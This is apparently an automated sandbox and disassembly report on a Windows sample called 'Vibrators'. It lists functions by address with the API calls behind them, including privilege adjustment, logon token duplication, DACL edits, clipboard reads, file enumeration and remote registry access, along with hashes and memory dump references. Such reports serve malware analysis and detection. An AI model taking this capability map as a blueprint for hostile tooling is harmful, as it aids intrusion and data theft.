Opcode Fuzzy Hash: da235195c61eb84b93dad113f01942bade5b29d048543eec5704ff329c0b0ce2
Instruction Fuzzy Hash: 5AF039B1505702DFCB349F68D8A4826BBE4BF143293248E3EE6D686610C7359880DF50

Function 00A46AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A46AE0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: aa3ff55ca361b58b3109fa9020fde971ec7a2c199a61a2f7b66b9d5d1e703364
Instruction ID: e787107cce2f1e0684fb2e3e092fb66676777ec5ce6173a5893e49362afee5bf
Opcode Fuzzy Hash: aa3ff55ca361b58b3109fa9020fde971ec7a2c199a61a2f7b66b9d5d1e703364
Instruction Fuzzy Hash: 48F0E5B1B04608AAD7209BA4A805BE2F7F8AB41354F14451ED4D5821C1D7B644D89792

Function 009F684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 009F6868

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 82c5130a056c3c92b16f83fbdf6bb884af6577106a5764db682e4a0d4a6c977a
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: D1F0F87550020DFFDF05DF94C941EAEBB79FF04318F208449F9159A151C336EA61ABA1

Function 009F3907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 009F3963

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: ebc9ae3bbd25065b86c0ad29197d1a4eaebf18c9a1faa272cc7cffe0551a66e0
Instruction ID: 56bce7ad6df1095f30bcbdf91ed19547a35d223fb5b1a6f99cf88c0ee4d9e20a
Opcode Fuzzy Hash: ebc9ae3bbd25065b86c0ad29197d1a4eaebf18c9a1faa272cc7cffe0551a66e0
Instruction Fuzzy Hash: 26F037709143589FE752DF64DC45BD57BFCA70170CF0040A5A6449A282D7745789CF51

Function 009F3A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 009F3A76

Part of subcall function 009F8577: _wcslen.LIBCMT ref: 009F858A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 8737ced146ecd79fb781818b4996b298dccf1ca45270a6386d03ec6ba24e5f82
Instruction ID: 84edf8821f668ba0468292497b00b3738475ac0521c6a6de643d5acb36286254
Opcode Fuzzy Hash: 8737ced146ecd79fb781818b4996b298dccf1ca45270a6386d03ec6ba24e5f82
Instruction Fuzzy Hash: 3BE0C272A002285BCB20E2989C06FEF77EDDFC87A0F0440B1FD09D7258E960ED808790

Function 00A3071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00A30A84,?,?,00000000,?,00A30A84,00000000,0000000C), ref: 00A30737

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2a9ae1228ecb1c2d5337afaef596bf8b832d8aa074ccf95f8e2ae9d24947796a
Instruction ID: 7fdc5d8de4a163a4661e5ca2c500223efa41cf80e9c029062e257ad9565ba8ae
Opcode Fuzzy Hash: 2a9ae1228ecb1c2d5337afaef596bf8b832d8aa074ccf95f8e2ae9d24947796a
Instruction Fuzzy Hash: C2D06C3200010DBBDF028F84DD46EDA3FAAFB48714F014100BE1896060C732E822AB90

Function 00A5EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00A5D840), ref: 00A5EAB1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fde5863512086af6982d6161acfccbef7682671b612d86ae45b78479fa9775fe
Instruction ID: a453e6baafe3d096a0dae7a6cc45270891831868fec8c6c3c4eee9d3378bcfc2
Opcode Fuzzy Hash: fde5863512086af6982d6161acfccbef7682671b612d86ae45b78479fa9775fe
Instruction Fuzzy Hash: 6DB0923440060005AD2C8B385A09999330078423F77DC1BC0F97D850E2E3398D0FAA50

Function 00A6664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A5DC54: FindFirstFileW.KERNEL32(?,?), ref: 00A5DCCB
Part of subcall function 00A5DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00A5DD1B
Part of subcall function 00A5DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A5DD2C
Part of subcall function 00A5DC54: FindClose.KERNEL32(00000000), ref: 00A5DD43

GetLastError.KERNEL32 ref: 00A6666E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 354ad8e87b5978efbf9e411e5a48e8cf125584bcb4bf5965f50d4c394cc33b01
Instruction ID: 713e3fc8ff15f4326fcb20d491825ef77e8f32071c853eb69ec471b469ec61b7
Opcode Fuzzy Hash: 354ad8e87b5978efbf9e411e5a48e8cf125584bcb4bf5965f50d4c394cc33b01
Instruction Fuzzy Hash: FDF082352001045FCB14EF58D445B6EB7E5AF94721F048449F9058B352CB74BC01CB90

Non-executed Functions

Function 00A51B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00A52010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5205A
Part of subcall function 00A52010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A52087
Part of subcall function 00A52010: GetLastError.KERNEL32 ref: 00A52097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00A51BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00A51BF4
CloseHandle.KERNEL32(?), ref: 00A51C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A51C1D
GetProcessWindowStation.USER32 ref: 00A51C36
SetProcessWindowStation.USER32(00000000), ref: 00A51C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A51C5C

Part of subcall function 00A51A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A51B48), ref: 00A51A20
Part of subcall function 00A51A0B: CloseHandle.KERNEL32(?,?,00A51B48), ref: 00A51A35

Strings

default, xrefs: 00A51C57
winsta0, xrefs: 00A51C18
, xrefs: 00A51BA6

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 140bb33ca9033ec81155a042460653c6497eb506bba98413b97d26a028509d66
Instruction ID: 44255129e29803f077c100c3f998ecd63e984ef25c5ef65e32c9548727bf84fc
Opcode Fuzzy Hash: 140bb33ca9033ec81155a042460653c6497eb506bba98413b97d26a028509d66
Instruction Fuzzy Hash: A78156B2900208ABDF119FA4DD89FFE7BB8FF08345F144129FD14A61A0E775894ACB60

Function 00A514AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A51A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A51A60
Part of subcall function 00A51A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A514E7,?,?,?), ref: 00A51A6C
Part of subcall function 00A51A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A514E7,?,?,?), ref: 00A51A7B
Part of subcall function 00A51A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A514E7,?,?,?), ref: 00A51A82
Part of subcall function 00A51A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A51A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A51518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A5154C
GetLengthSid.ADVAPI32(?), ref: 00A51563
GetAce.ADVAPI32(?,00000000,?), ref: 00A5159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A515B9
GetLengthSid.ADVAPI32(?), ref: 00A515D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A515D8
HeapAlloc.KERNEL32(00000000), ref: 00A515DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A51600
CopySid.ADVAPI32(00000000), ref: 00A51607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A51636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A51658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A5166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A51691
HeapFree.KERNEL32(00000000), ref: 00A51698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A516A1
HeapFree.KERNEL32(00000000), ref: 00A516A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A516B1
HeapFree.KERNEL32(00000000), ref: 00A516B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00A516C4
HeapFree.KERNEL32(00000000), ref: 00A516CB

Part of subcall function 00A51ADF: GetProcessHeap.KERNEL32(00000008,00A514FD,?,00000000,?,00A514FD,?), ref: 00A51AED
Part of subcall function 00A51ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A514FD,?), ref: 00A51AF4
Part of subcall function 00A51ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A514FD,?), ref: 00A51B03

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 2c55fd07101a2c3b95b65e272bd09edbd50545e4fbfa620a30f6302c5f2d06c8
Instruction ID: 5e4b394bf49247068d429a0d15389eb3650ba8da3139fe5087359d8bce764cbc
Opcode Fuzzy Hash: 2c55fd07101a2c3b95b65e272bd09edbd50545e4fbfa620a30f6302c5f2d06c8
Instruction Fuzzy Hash: 237159B6900209BBDF10DFA5DC48FBEBBB9FF04352F184615E915A7190D7319A0ACBA0

Function 00A6F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00A8DCD0), ref: 00A6F586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00A6F594
GetClipboardData.USER32(0000000D), ref: 00A6F5A0
CloseClipboard.USER32 ref: 00A6F5AC
GlobalLock.KERNEL32(00000000), ref: 00A6F5E4
CloseClipboard.USER32 ref: 00A6F5EE
GlobalUnlock.KERNEL32(00000000), ref: 00A6F619
IsClipboardFormatAvailable.USER32(00000001), ref: 00A6F626
GetClipboardData.USER32(00000001), ref: 00A6F62E
GlobalLock.KERNEL32(00000000), ref: 00A6F63F
GlobalUnlock.KERNEL32(00000000), ref: 00A6F67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00A6F695
GetClipboardData.USER32(0000000F), ref: 00A6F6A1
GlobalLock.KERNEL32(00000000), ref: 00A6F6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A6F6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A6F6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A6F72F
GlobalUnlock.KERNEL32(00000000), ref: 00A6F750
CountClipboardFormats.USER32 ref: 00A6F771
CloseClipboard.USER32 ref: 00A6F7B6

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: bedaed8e6e9c404284756f2810b9a724fe937b9b1a79f8e984a2d94e99e53c2e
Instruction ID: 7f35242ec59c14f7e6aee42cfca74b41f05bbb60d6c2c069331ac242644708cc
Opcode Fuzzy Hash: bedaed8e6e9c404284756f2810b9a724fe937b9b1a79f8e984a2d94e99e53c2e
Instruction Fuzzy Hash: 1961AB35204305AFD300EF64E888F6ABBB4AF84758F144469F956C72E2DB31ED46CB62

Function 00A673D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A67403
FindClose.KERNEL32(00000000), ref: 00A67457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A67493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A674BA

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00A674F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00A67524

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 00A67577
%4d, xrefs: 00A675F6
%4d%02d%02d%02d%02d%02d, xrefs: 00A675AF
%03d, xrefs: 00A677E7
%02d, xrefs: 00A67645, 00A6764F, 00A6769F, 00A676EF, 00A6773F, 00A6778F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 9b6ec03ff468b65bd82681a02fb7e560b2d2bea917a69c18f69551b3965c2d14
Instruction ID: 346c0890a77f76abc5daab73c523311c54326bf1fd433ee9d707f9ee4ebcfb16
Opcode Fuzzy Hash: 9b6ec03ff468b65bd82681a02fb7e560b2d2bea917a69c18f69551b3965c2d14
Instruction Fuzzy Hash: 9ED12FB2508348AEC710EF64C895EBFB7ECAF88704F44491DF685D6192EB74DA44CB62

Function 00A6A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00A6A0A8
GetFileAttributesW.KERNEL32(?), ref: 00A6A0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00A6A100
FindNextFileW.KERNEL32(00000000,?), ref: 00A6A118
FindClose.KERNEL32(00000000), ref: 00A6A123
FindFirstFileW.KERNEL32(*.*,?), ref: 00A6A13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00A6A18F
SetCurrentDirectoryW.KERNEL32(00AB7B94), ref: 00A6A1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A6A1B7
FindClose.KERNEL32(00000000), ref: 00A6A1C4
FindClose.KERNEL32(00000000), ref: 00A6A1D4

Strings

*.*, xrefs: 00A6A13A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: d97c26851e24324e0d9e2e0a1766ae1f2928e2141719f670068ba22094069f1a
Instruction ID: 13309960b42ac29df40b2411ddadb7f0c04e2426142c222387acb08557f59a88
Opcode Fuzzy Hash: d97c26851e24324e0d9e2e0a1766ae1f2928e2141719f670068ba22094069f1a
Instruction Fuzzy Hash: 1D31F132A00219ABDB10EFB4DC49ADE73BCAF56360F000691E815E20D0EB74DE818F21

Function 00A64763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A64785
_wcslen.LIBCMT ref: 00A647B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00A647E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A64803
RemoveDirectoryW.KERNEL32(?), ref: 00A64813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A6489A
CloseHandle.KERNEL32(00000000), ref: 00A648A5
CloseHandle.KERNEL32(00000000), ref: 00A648B0

Strings

\, xrefs: 00A647BC
\??\%s, xrefs: 00A647A0
:, xrefs: 00A647C7

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: e7f88c33869bdd715620a15a3ea888e9a6c6a8033bf0c2d5fb334e4e3877ad0f
Instruction ID: 1bd5a6b9bcff35060ff25c65288e72a21ba6c69c060063e9bb95b56462febd7e
Opcode Fuzzy Hash: e7f88c33869bdd715620a15a3ea888e9a6c6a8033bf0c2d5fb334e4e3877ad0f
Instruction Fuzzy Hash: 313190B190024AABDB21DFA0DC49FEB37BDEF89740F1041B6F519D61A0E77096858B64

Function 00A6A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00A6A203
FindNextFileW.KERNEL32(00000000,?), ref: 00A6A25E
FindClose.KERNEL32(00000000), ref: 00A6A269
FindFirstFileW.KERNEL32(*.*,?), ref: 00A6A285
SetCurrentDirectoryW.KERNEL32(?), ref: 00A6A2D5
SetCurrentDirectoryW.KERNEL32(00AB7B94), ref: 00A6A2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A6A2FD
FindClose.KERNEL32(00000000), ref: 00A6A30A
FindClose.KERNEL32(00000000), ref: 00A6A31A

Part of subcall function 00A5E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A5E3B4

Strings

*.*, xrefs: 00A6A280

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 001d27e046bc513fc3a18b783cb3e6c068fc65bbdc6dee6f75c31d03e806252d
Instruction ID: d4b949b956c6ba8e58057cc3cddd751fec3692c3a1563200f08014d1d3d48c29
Opcode Fuzzy Hash: 001d27e046bc513fc3a18b783cb3e6c068fc65bbdc6dee6f75c31d03e806252d
Instruction Fuzzy Hash: DB310F32940619AACB10EFB4EC49EDE77BCAF95320F144191E810B21E0EB71DE868F21

Function 00A7C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A7C10E,?,?), ref: 00A7D415
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D451
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D4C8
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00A7CA09
RegCloseKey.ADVAPI32(00000000), ref: 00A7CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A7CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A7CB47
